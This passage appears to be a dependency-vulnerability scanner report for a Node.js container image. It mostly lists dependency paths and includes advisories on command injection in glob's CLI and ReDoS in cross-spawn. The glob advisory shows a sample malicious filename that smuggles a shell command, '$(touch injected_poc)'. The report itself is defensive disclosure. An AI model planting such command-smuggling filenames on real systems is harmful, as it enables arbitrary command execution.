  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + + +
    • +
+ +
+ +
+ +

Overview

+

Affected versions of this package are vulnerable to Command Injection in the CLI, via the -c/--cmd option. The processing of commandline options in src/bin.mts calls the foregroundChild() on them, which defaults to setting shell: true. An attacker who can control the filenames being matched can execute arbitrary commands with the privileges of the user running the process by writing files with malicious names containing shell metacharacters - e.g. $(touch injected_poc).

+

The malicious filename must be the target of a match by the glob -c command. Such filenames would not trigger this exploit when invoking glob() or related functions via the library API.

+

Remediation

+

Upgrade glob to version 10.5.0, 11.1.0 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Regular Expression Denial of Service (ReDoS)

+
+ +
+
+ high severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + cross-spawn +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/config@8.3.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + init-package-json@6.0.3 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/map-workspaces@3.0.6 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
